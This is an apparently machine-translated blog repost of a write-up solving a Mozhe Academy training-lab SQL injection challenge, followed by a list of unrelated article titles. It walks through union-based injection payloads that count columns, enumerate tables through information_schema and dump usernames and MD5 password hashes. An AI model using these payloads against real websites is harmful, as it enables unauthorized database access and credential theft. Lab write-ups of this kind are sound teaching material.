当前位置:网站首页>Mozi college SQL injection solution
Mozi college SQL injection solution
2020-11-08 09:40:00 【osc_7bgz0no1】
One · Judgment injection
Input id=1, Normal return . Input id=-1 Returns an error . from This shows that there is injection .
Two · Judgment fields
URL id=-1 order by 1
URL id=-1 order by 2
URL id=-1 order by 3
URL id=-1 order by 4
URL id=-1 order by 5 An error at this time , The description has four fields
3、 ... and · Use union Query injection point
Input union select 1,2,3,4
Find out 2,3 For the obvious note point
Four · Use database() Chaku name
Input union select 1,database(),3,4
Find out the name of the library mozhe_Discuz_StormGroup
5、 ... and · Look up the name of the table
Input
union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’
Query to StormGroup_member,notice
See member, So doubt about the first one . So first look up the first .
6、 ... and · Inquire about StormGroup_member The fields stored in the
Input
union select 1,group_concat(column_name)3,4 from information_schema.columns where table_name=‘StormGroup_member’
Query out id,name,password,status
7、 ... and · Query password and user name
union select 1,group_concat(name,0x3a,password),3,4 from StormGroup_member
obtain md5 Encrypted value . To decrypt , Get the code .
If the password is wrong , adopt limit m,n To continue with the inquiry .
8、 ... and · Submit key
After getting the password, you can see key, Copy , Submit .
版权声明
本文为[osc_7bgz0no1]所创,转载请带上原文链接,感谢
边栏推荐
- 墨者学院SQL注入解题
- “1024”征文活动结果新鲜出炉!快来看看是否榜上有名?~~
- 我们采访了阿里云云数据库SQL Server的产品经理,他说了解这四个问题就可以了...
- C++在C的基础上改进了哪些细节
- Bili Bili common API
- Game mathematical derivation AC code (high precision and low precision multiplication and division comparison) + 60 code (long long) + 20 point code (Full Permutation + deep search DFS)
- print( 'Hello,NumPy!' )
- Solve Safari browser download file name garbled problem
- python学习 day1——基础学习
- 解决RabbitMQ消息丢失与重复消费问题
猜你喜欢

What details does C + + improve on the basis of C

墨者学院SQL注入解题

ts流中的pcr与pts计算与逆运算

技术人员该如何接手一个复杂的系统?

Swiper window width changes, page width height changes lead to automatic sliding solution

Deeplight Technology Bluetooth protocol SRRC certification services

Rust:命令行参数与环境变量操作

Python loop distinction (while loop and for loop)

Dogs can also operate drones! You're right, but it's actually an autonomous drone - you know

Basic concepts of computer network (5) basic principles of local area network
随机推荐
“智能5G”引领世界,数位智能网优+5G能带来什么?
Test requirements for MIC certification of Bluetooth 2.4G products in Japan
laravel8更新之速率限制改进
【原创】关于高版本poi autoSizeColumn方法异常的情况
[computer network] learning notes, Part 3: data link layer (Xie Xiren version)
Template linked list learning
Face recognition: attack types and anti spoofing techniques
Rust: command line parameter and environment variable operation
盘点那些你没想到的云计算应用场景(上)
“1024”征文活动结果新鲜出炉!快来看看是否榜上有名?~~
iOS 学习笔记二【cocopods安装使用和安装过程中遇到的问题及解决办法】【20160725更新】
个人目前技术栈
来自不同行业领域的50多个对象检测数据集
Rust:命令行参数与环境变量操作
Cloud alibabab notes come out, the whole network detailed explanation only this one hand is slow
Adobe Prelude / PL 2020 software installation package (with installation tutorial)
nvm
FORTRAN77从文件中读入若干数据并用heron迭代公式开方
Oops, the system is under attack again
Unparseable date: 'Mon Aug 15 11:24:39 CST 2016',时间格式转换异常